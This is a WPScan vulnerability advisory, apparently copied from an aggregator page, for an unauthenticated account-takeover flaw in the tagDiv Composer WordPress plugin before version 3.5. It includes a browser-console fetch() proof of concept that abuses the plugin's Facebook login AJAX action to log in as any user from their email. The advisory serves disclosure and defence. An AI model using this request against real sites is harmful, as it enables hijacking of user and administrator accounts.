Lucene search

K
wpvulndbTruoc Phan from Techlab CorporationWPVDB-ID:993A95D2-6FCE-48DE-AE17-06CE2DB829EF
HistoryOct 24, 2022 - 12:00 a.m.

tagDiv Composer < 3.5 - Unauthenticated Account Takeover

2022-10-2400:00:00
Truoc Phan from Techlab Corporation
wpscan.com
56
plugin security vulnerability
unauthenticated access
account takeover

EPSS

0.003

Percentile

71.0%

The plugin, required by the themes, does not properly implement the Facebook login feature, allowing unauthenticated attackers to login as any user by just knowing their email address

PoC

Run the below command in the developer console of the web browser while being on the blog as an unauthenticated user fetch(“/wp-admin/admin-ajax.php”, { “headers”: { “content-type”: “application/x-www-form-urlencoded”, }, “method”: “POST”, “body”: ‘action=td_ajax_fb_login_user&user;[email][email protected]’, “credentials”: “include” }).then(response => response.text()) .then(data => console.log(data)); Then refresh the page to be logged in as the user with the [email protected] email address

EPSS

0.003

Percentile

71.0%

Related for WPVDB-ID:993A95D2-6FCE-48DE-AE17-06CE2DB829EF